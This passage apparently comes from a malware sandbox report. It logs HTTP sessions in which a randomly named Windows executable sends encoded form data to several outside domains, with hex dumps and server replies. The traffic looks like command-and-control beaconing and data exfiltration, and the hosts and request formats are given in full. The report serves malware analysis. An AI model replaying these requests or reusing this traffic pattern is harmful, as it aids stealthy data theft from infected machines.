                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 5a 45 66 4e 7a 53 4d 36 59 6e 46 79 4b 34 50 39 70 6c 6c 6f 72 2f 44 52 4d 51 41 61 4a 37 63 66 39 63 44 30 73 32 57 71 53 6b 39 34 50 32 54 49 52 4f 2b 37 75 6f 78 62 62 7a 58 61 4d 74 2b 53 79 49 6f 75 32 63 69 43 6d 6e 61 45 36 33 53 66 70 32 31 74 68 51 53 76 35 79 41 68 71 4f 47 6d 72 5a 72 36 54 4a 57 34 74 73 74 45 73 69 39 4a 50 2b 4a 79 6d 59 38 53 37 65 35 30 72 42 76 4d 47 62 4e 6a 56 44 36 67 6d 41 2f 41 63 74 63 72 6c 47 77 4d 37 35 47 43 58 2b 38 6b 68 34 58 76 44 51 36 58 4f 37 41 45 5a 44 68 39 57 6f 58 2f 39 46 44 6d 37 66 4d 50 56 67 71 72 56 42 43 39 78 33 70 6e 4a 57 4a 72 62 7a 44 59 54 55 76 46 37 66 71 5a 66 54 62 4a 6a 54 6d 30 4d 67 59 6b 4c 66 53 31 4c 73 71 72 67 6f 6f 58 30 61 4a 62 41 49 6a 41 6f 66 59 56 36 41 61 5a 4c 55 49 45 62 64 38 4a 38 61 63 54 4f 75 43 71 77 65 7a 41 7a 79 70 74 44 7a 54 69 61 4f 43 4d 59 32 6b 46 35 65 38 30 50 66 38 63 43 46 38 71 2f 64 4a 6f 6a 59 67 31 61 4a 4a 65 6f 79 59 54 35 2f 62 65 45 74 45 69 54 2f 31 45 2f 76 6f [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=ZEfNzSM6YnFyK4P9pllor/DRMQAaJ7cf9cD0s2WqSk94P2TIRO+7uoxbbzXaMt+SyIou2ciCmnaE63Sfp21thQSv5yAhqOGmrZr6TJW4tstEsi9JP+JymY8S7e50rBvMGbNjVD6gmA/ActcrlGwM75GCX+8kh4XvDQ6XO7AEZDh9WoX/9FDm7fMPVgqrVBC9x3pnJWJrbzDYTUvF7fqZfTbJjTm0MgYkLfS1LsqrgooX0aJbAIjAofYV6AaZLUIEbd8J8acTOuCqwezAzyptDzTiaOCMY2kF5e80Pf8cCF8q/dJojYg1aJJeoyYT5/beEtEiT/1E/vobQBLgFQBOvNZ4OnmEAYkRmpLCPuX721vJosYMoIg/C7YTOJX9umZwLy6AT83xqt2kqcxTEImrEKzwuEdRj1oeFQa8rLAE2upAshkJeFDN+H65Suqxron5B6GPU6WeDc8NETIjBxwlb/PMy2sleEYLfx77wUV/m4u12j/3IhRZmxs3R3H5wgJzLc+B3lKm6qdKjN4fgasIoQ2IQQPQgXBHEj5FqGrnr5wSvoh+J7MlnbOAAnS7TZalkEXc/qsD6Ne3lxKMD6AkiFYbi8mEEnj8dM/+UNplNCnHhYtggY1FkHrK85iQVkIUzlNBy5pSAfccRjALiLCAaYlk8KltGRhlj/nAT4jnLOkBgv5PScL7nv8eRvE+ftiwU29/HAhBAHe0oAJ+Z8lSD1M5+b5XI6a9911+xaTOMe2K5Asq5mE64dm8LWk9jOOQj13iqiF+KpYc43XRHB5n94FsAm1+Ixd3SrJTDTwG88WZxGjJGt80kMC3tlMlZhsWsSV8B4pabd/uKBihBjyWKoqza8qFAQnZQ+rSUKziMRVaiylhoVHtzE15uDDe4I1W3eZDVuZRR1RNKkrlHSl3L5E0xqzBCLDu2OP348AZxON4uF7HMyzLVMlw9DHMOCFiX37kRQaQCPKyjaSq0IqxpXqZTMNR7FTjv6YJl2SbPQQc/ [TRUNCATED]


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  40192.168.2.4500473.33.130.190801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:22.324640036 CEST526OUTGET /frw6/?kf-HBx=UG3twl1RTWICP6a+snMr6dqVChYRNbF04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRygeU7S1OzbuuspnSBo+prL8MhwcFbuUikZc=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.digitalbloom.info
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Oct 24, 2024 08:04:23.949486017 CEST394INHTTP/1.1 200 OK
                                                                                                                                  Server: openresty
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:23 GMT
                                                                                                                                  Content-Type: text/html
                                                                                                                                  Content-Length: 254
                                                                                                                                  Connection: close
                                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6b 66 2d 48 42 78 3d 55 47 33 74 77 6c 31 52 54 57 49 43 50 36 61 2b 73 6e 4d 72 36 64 71 56 43 68 59 52 4e 62 46 30 34 74 66 39 6a 6b 32 7a 4a 7a 52 45 4c 31 48 46 45 66 65 4d 33 64 68 65 47 68 58 76 5a 4a 61 32 78 65 6b 6c 67 4a 57 36 6e 79 79 35 39 48 2b 46 70 78 4e 52 79 67 65 55 37 53 31 4f 7a 62 75 75 73 70 6e 53 42 6f 2b 70 72 4c 38 4d 68 77 63 46 62 75 55 69 6b 5a 63 3d 26 6f 46 41 3d 5f 7a 35 78 39 42 35 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?kf-HBx=UG3twl1RTWICP6a+snMr6dqVChYRNbF04tf9jk2zJzREL1HFEfeM3dheGhXvZJa2xeklgJW6nyy59H+FpxNRygeU7S1OzbuuspnSBo+prL8MhwcFbuUikZc=&oFA=_z5x9B5"}</script></head></html>


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  41192.168.2.450048142.250.186.83801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:29.277343988 CEST805OUTPOST /5ab9/ HTTP/1.1
                                                                                                                                  Host: www.amitayush.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.amitayush.digital
                                                                                                                                  Referer: http://www.amitayush.digital/5ab9/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 63 49 33 34 70 59 4f 41 47 67 6c 63 77 78 7a 75 77 73 58 52 6b 59 53 70 54 52 68 6c 6a 33 59 44 31 44 6e 4a 4c 4b 6d 57 32 4d 52 35 71 50 79 67 34 46 35 78 70 32 52 6a 78 41 6f 68 68 6d 57 36 58 4e 48 58 34 71 77 6e 61 52 76 30 4d 62 65 55 77 54 70 39 63 4f 66 72 34 67 42 35 62 78 39 58 68 72 72 65 79 50 77 55 56 57 2f 4d 77 7a 48 41 73 75 30 53 79 7a 55 49 78 68 33 52 4e 56 2b 41 30 33 62 49 67 78 53 32 67 59 30 6a 76 4b 39 4d 74 77 72 65 70 4c 4c 30 50 48 6c 6f 2b 39 64 6b 51 34 76 47 62 6b 5a 46 75 75 44 73 75 56 54 71 31 4a 6e 50 50 62 4b 52 42 44 4c 79 32 4b 49 75 65 41 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=cI34pYOAGglcwxzuwsXRkYSpTRhlj3YD1DnJLKmW2MR5qPyg4F5xp2RjxAohhmW6XNHX4qwnaRv0MbeUwTp9cOfr4gB5bx9XhrreyPwUVW/MwzHAsu0SyzUIxh3RNV+A03bIgxS2gY0jvK9MtwrepLL0PHlo+9dkQ4vGbkZFuuDsuVTq1JnPPbKRBDLy2KIueA==
                                                                                                                                  Oct 24, 2024 08:04:30.249777079 CEST407INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: application/binary
                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:30 GMT
                                                                                                                                  Location: https://www.amitayush.digital/5ab9/
                                                                                                                                  Server: ESF
                                                                                                                                  Content-Length: 0
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  42192.168.2.450049142.250.186.83801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:31.896152020 CEST825OUTPOST /5ab9/ HTTP/1.1
                                                                                                                                  Host: www.amitayush.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.amitayush.digital
                                                                                                                                  Referer: http://www.amitayush.digital/5ab9/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 63 49 33 34 70 59 4f 41 47 67 6c 63 78 53 37 75 79 4c 44 52 6a 34 53 6d 63 78 68 6c 71 58 59 48 31 44 72 4a 4c 49 4c 4c 33 2b 6c 35 71 75 43 67 37 45 35 78 71 32 52 6a 2b 67 70 72 6c 6d 57 68 58 4e 43 6b 34 75 30 6e 61 52 72 30 4d 62 4f 55 7a 67 42 2b 54 2b 66 74 2b 67 42 37 66 78 39 58 68 72 72 65 79 50 31 78 56 58 58 4d 77 41 76 41 2b 37 41 56 38 54 55 58 79 68 33 52 4a 56 2b 45 30 33 61 74 67 77 4f 4d 67 61 38 6a 76 4b 74 4d 74 68 72 5a 7a 62 4c 79 44 58 6b 68 2b 73 34 39 65 49 69 31 54 32 64 2b 78 4f 48 67 76 54 43 77 6b 34 47 59 64 62 75 69 63 45 43 47 37 4a 31 6e 46 4b 4f 53 48 47 78 6b 4a 79 76 78 62 53 47 57 34 31 7a 37 4d 33 63 3d
                                                                                                                                  Data Ascii: kf-HBx=cI34pYOAGglcxS7uyLDRj4SmcxhlqXYH1DrJLILL3+l5quCg7E5xq2Rj+gprlmWhXNCk4u0naRr0MbOUzgB+T+ft+gB7fx9XhrreyP1xVXXMwAvA+7AV8TUXyh3RJV+E03atgwOMga8jvKtMthrZzbLyDXkh+s49eIi1T2d+xOHgvTCwk4GYdbuicECG7J1nFKOSHGxkJyvxbSGW41z7M3c=
                                                                                                                                  Oct 24, 2024 08:04:32.837163925 CEST407INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: application/binary
                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:32 GMT
                                                                                                                                  Location: https://www.amitayush.digital/5ab9/
                                                                                                                                  Server: ESF
                                                                                                                                  Content-Length: 0
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  43192.168.2.450050142.250.186.83801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:34.440768003 CEST10907OUTPOST /5ab9/ HTTP/1.1
                                                                                                                                  Host: www.amitayush.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.amitayush.digital
                                                                                                                                  Referer: http://www.amitayush.digital/5ab9/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 63 49 33 34 70 59 4f 41 47 67 6c 63 78 53 37 75 79 4c 44 52 6a 34 53 6d 63 78 68 6c 71 58 59 48 31 44 72 4a 4c 49 4c 4c 33 2b 39 35 71 34 65 67 37 6e 52 78 72 32 52 6a 33 41 70 71 6c 6d 58 35 58 4e 36 37 34 75 34 64 61 54 6a 30 4f 34 57 55 6b 68 42 2b 45 75 66 74 7a 41 42 32 62 78 38 4e 68 71 48 61 79 4d 64 78 56 58 58 4d 77 46 72 41 75 65 30 56 73 6a 55 49 78 68 33 56 4e 56 2b 38 30 33 43 62 67 77 4b 6d 67 72 63 6a 76 72 64 4d 68 7a 7a 5a 72 4c 4c 77 43 6e 6b 35 2b 73 45 59 65 49 76 4f 54 33 35 55 78 4d 62 67 75 6e 50 52 78 5a 7a 42 42 74 75 4d 42 54 66 6b 33 75 45 2b 65 63 75 73 41 44 30 34 61 7a 4b 44 5a 51 6e 42 6c 46 54 4c 50 53 51 31 4c 69 63 48 57 33 45 76 69 46 75 66 4e 7a 44 77 49 48 64 6e 65 57 4c 59 57 58 62 4c 5a 71 49 56 59 73 36 4c 67 75 5a 59 2f 77 43 70 6c 6e 43 31 49 53 6c 64 79 67 36 30 73 4f 4a 32 70 58 5a 46 59 74 67 34 43 50 5a 61 62 38 66 2b 53 36 79 75 6d 6c 69 78 6a 73 63 59 43 71 45 48 77 4d 6f 4f 4f 50 49 5a 4f 4b 69 78 6f 6a 53 7a 55 36 56 4d 49 38 64 [TRUNCATED]
                                                                                                                                  Data Ascii: kf-HBx=cI34pYOAGglcxS7uyLDRj4SmcxhlqXYH1DrJLILL3+95q4eg7nRxr2Rj3ApqlmX5XN674u4daTj0O4WUkhB+EuftzAB2bx8NhqHayMdxVXXMwFrAue0VsjUIxh3VNV+803CbgwKmgrcjvrdMhzzZrLLwCnk5+sEYeIvOT35UxMbgunPRxZzBBtuMBTfk3uE+ecusAD04azKDZQnBlFTLPSQ1LicHW3EviFufNzDwIHdneWLYWXbLZqIVYs6LguZY/wCplnC1ISldyg60sOJ2pXZFYtg4CPZab8f+S6yumlixjscYCqEHwMoOOPIZOKixojSzU6VMI8dvK1Wj4cf0flyHol4ApV7K2Zx94VBxGvDRROjlFLZrkzGPd+npthGZ4OUmOML6uvDaPDflFnPiRx+tS2sIuBCe8BVbd3mGI+NtoEHAzVuc5ajl/I/11sfSe3VOzxNC1ud1kcvLE8LLPfO2JDlHgRJVhgkPvTcMGsIkLUOH1sW3zH3l5Hce5RrK/t8DFYhIpvWmPumBiA/K4VRLTH5EBWXa7nYlZZ08qFVvEE2jnVetB/5O6/J16sSbxbzeIqFBq1Z9X9bCTIT/JhM06ebUGVFPVyTCyP5w91hyKjq4KF5GN2NhVcBljgib1LF36vlfKSfJ5aUM/ElHUmEUd0mI+ypLF3mCMxMlAbY4oXMscp7MHz6XRQi4vCCGsJyJ7WtE5xDHg838fMEp9hQqI2NeI+9l+qzrh/Ke8UVT+frT9iAOPIVdGhQxJYPlfCIEh1tlE4GwBSpea36/WPtUxwgxj/w34F0dZZMdhKVN7QAZJ4e4mgT/Gvj7ZkzjNax5aGoI9yrv8z4wUaBxMFzd6a8POxCut4ilMRIUuw7eC8x1DkrJa4SGI27gGon3c6hE4bRfpX9WlxwKQf97PO+zHLAr6AGwGu1PqeZnsDUWLe2ZXUbC24r/2RMXh3IM3vuVNni6mvvEBd2B7ImA0I3iO9rPased8Ms+V/urvm1DX [TRUNCATED]
                                                                                                                                  Oct 24, 2024 08:04:35.374715090 CEST407INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: application/binary
                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:35 GMT
                                                                                                                                  Location: https://www.amitayush.digital/5ab9/
                                                                                                                                  Server: ESF
                                                                                                                                  Content-Length: 0
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  44192.168.2.450051142.250.186.83801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:36.984633923 CEST526OUTGET /5ab9/?kf-HBx=RKfYqv7dLSd52zuxxJ7U+qX1dgM0j08UigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HJzLwgFpIUBewc3Sq/1ccTai3Bmxrp0U6E4=&oFA=_z5x9B5 HTTP/1.1
                                                                                                                                  Host: www.amitayush.digital
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Connection: close
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Oct 24, 2024 08:04:37.922194004 CEST549INHTTP/1.1 301 Moved Permanently
                                                                                                                                  Content-Type: application/binary
                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                  Pragma: no-cache
                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                  Date: Thu, 24 Oct 2024 06:04:37 GMT
                                                                                                                                  Location: https://www.amitayush.digital/5ab9/?kf-HBx=RKfYqv7dLSd52zuxxJ7U+qX1dgM0j08UigLPO7fV9fYs6caX5nN0t2AmzQZhkSW6ZNnx9rwHNAGWB6es6Bp2HJzLwgFpIUBewc3Sq/1ccTai3Bmxrp0U6E4%3D&oFA=_z5x9B5
                                                                                                                                  Server: ESF
                                                                                                                                  Content-Length: 0
                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                  Connection: close


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  45192.168.2.450052172.81.61.224801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:43.105602026 CEST799OUTPOST /d5je/ HTTP/1.1
                                                                                                                                  Host: www.moritynomxd.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.moritynomxd.xyz
                                                                                                                                  Referer: http://www.moritynomxd.xyz/d5je/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 203
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 75 71 74 30 33 4c 50 77 67 7a 4b 47 53 31 39 6b 38 35 49 37 42 4c 67 65 42 63 71 7a 66 65 48 47 36 4d 6f 32 44 53 63 57 75 52 39 69 44 77 48 50 69 4a 35 4f 47 75 61 79 71 66 54 50 41 35 4d 67 49 58 45 45 79 42 67 6e 2f 4f 78 6f 63 4c 31 6d 35 66 52 2f 69 54 78 6a 70 44 4e 41 53 46 2f 43 74 51 77 4d 50 33 35 4c 49 4d 65 59 71 77 38 6d 57 71 65 72 64 61 7a 4c 4b 32 47 75 67 63 32 61 30 42 76 48 37 64 30 53 6d 65 36 6e 7a 4c 48 63 2b 48 4d 6d 4a 74 78 46 4d 6e 75 49 61 5a 47 5a 31 52 4a 4e 6c 51 7a 37 66 2f 72 66 61 62 59 44 33 46 58 68 67 44 52 47 42 6e 63 71 4a 35 72 64 50 41 3d 3d
                                                                                                                                  Data Ascii: kf-HBx=uqt03LPwgzKGS19k85I7BLgeBcqzfeHG6Mo2DScWuR9iDwHPiJ5OGuayqfTPA5MgIXEEyBgn/OxocL1m5fR/iTxjpDNASF/CtQwMP35LIMeYqw8mWqerdazLK2Gugc2a0BvH7d0Sme6nzLHc+HMmJtxFMnuIaZGZ1RJNlQz7f/rfabYD3FXhgDRGBncqJ5rdPA==


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  46192.168.2.450053172.81.61.224801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:45.653672934 CEST819OUTPOST /d5je/ HTTP/1.1
                                                                                                                                  Host: www.moritynomxd.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.moritynomxd.xyz
                                                                                                                                  Referer: http://www.moritynomxd.xyz/d5je/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 223
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 75 71 74 30 33 4c 50 77 67 7a 4b 47 53 55 74 6b 36 65 6b 37 4a 4c 67 52 50 38 71 7a 52 2b 48 4b 36 4d 6b 32 44 51 77 34 75 43 4a 69 44 51 33 50 77 64 74 4f 44 75 61 79 2b 50 53 45 4f 5a 4d 72 49 58 34 4d 79 42 73 6e 2f 4f 6c 6f 63 4c 46 6d 36 6f 46 34 68 6a 78 68 79 7a 4e 43 66 6c 2f 43 74 51 77 4d 50 32 4a 78 49 4d 47 59 71 41 73 6d 52 2b 4b 73 54 36 7a 49 64 47 47 75 33 4d 32 47 30 42 76 6c 37 64 45 34 6d 63 79 6e 7a 4f 37 63 2b 54 59 68 51 64 78 48 52 58 76 70 4b 62 7a 58 79 54 55 56 73 67 2f 2f 66 73 66 35 62 64 4a 5a 6d 30 32 32 79 44 31 31 63 67 56 65 45 36 57 55 55 41 58 45 76 50 70 57 71 32 72 58 5a 4c 73 71 6a 56 65 4f 61 41 6f 3d
                                                                                                                                  Data Ascii: kf-HBx=uqt03LPwgzKGSUtk6ek7JLgRP8qzR+HK6Mk2DQw4uCJiDQ3PwdtODuay+PSEOZMrIX4MyBsn/OlocLFm6oF4hjxhyzNCfl/CtQwMP2JxIMGYqAsmR+KsT6zIdGGu3M2G0Bvl7dE4mcynzO7c+TYhQdxHRXvpKbzXyTUVsg//fsf5bdJZm022yD11cgVeE6WUUAXEvPpWq2rXZLsqjVeOaAo=


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  47192.168.2.450054172.81.61.224801376C:\Program Files (x86)\YAodXpadNTymUQmxtjsDbXnbTgoyRNRjoLrbYoUeCzqA\mkvfHfXifKJWp.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  Oct 24, 2024 08:04:48.360774040 CEST10901OUTPOST /d5je/ HTTP/1.1
                                                                                                                                  Host: www.moritynomxd.xyz
                                                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                  Accept-Language: en-US
                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                  Origin: http://www.moritynomxd.xyz
                                                                                                                                  Referer: http://www.moritynomxd.xyz/d5je/
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=0
                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                  Content-Length: 10303
                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; MS-RTC LM 8; InfoPath.3; .NET4.0C; .NET4.0E)
                                                                                                                                  Data Raw: 6b 66 2d 48 42 78 3d 75 71 74 30 33 4c 50 77 67 7a 4b 47 53 55 74 6b 36 65 6b 37 4a 4c 67 52 50 38 71 7a 52 2b 48 4b 36 4d 6b 32 44 51 77 34 75 43 52 69 44 6a 50 50 69 76 46 4f 41 75 61 79 69 2f 53 48 4f 5a 4d 32 49 54 55 49 79 42 77 33 2f 4e 64 6f 64 71 6c 6d 2f 63 70 34 32 7a 78 68 74 44 4e 48 53 46 2f 4c 74 51 67 49 50 33 31 78 49 4d 47 59 71 47 49 6d 48 36 65 73 44 4b 7a 4c 4b 32 47 79 67 63 32 36 30 42 33 55 37 5a 59 43 6d 4e 53 6e 79 75 4c 63 37 67 77 68 50 74 78 4a 51 58 76 4c 4b 62 76 63 79 54 59 5a 73 6a 6a 56 66 72 33 35 59 62 64 47 7a 57 32 68 6c 77 51 72 4c 78 39 69 63 4a 4c 53 62 41 2f 52 75 66 4a 2b 79 46 54 75 42 5a 46 46 2b 57 61 52 44 58 76 6b 4e 7a 56 64 51 50 50 38 51 34 65 48 34 78 50 4e 68 6c 46 76 37 43 49 77 6d 41 55 71 70 50 55 62 79 64 37 64 6f 56 2f 4f 48 67 35 63 69 6e 63 66 38 78 64 2f 49 46 41 59 2f 38 57 53 6b 36 2f 76 56 42 51 6d 52 2f 74 30 48 75 6e 32 5a 46 2b 73 48 63 38 79 54 75 7a 4f 4a 72 4f 61 74 4b 69 4c 32 76 51 4c 61 6c 70 45 30 53 66 39 4e 37 6d 47 6b 6a 73 [TRUNCATED]
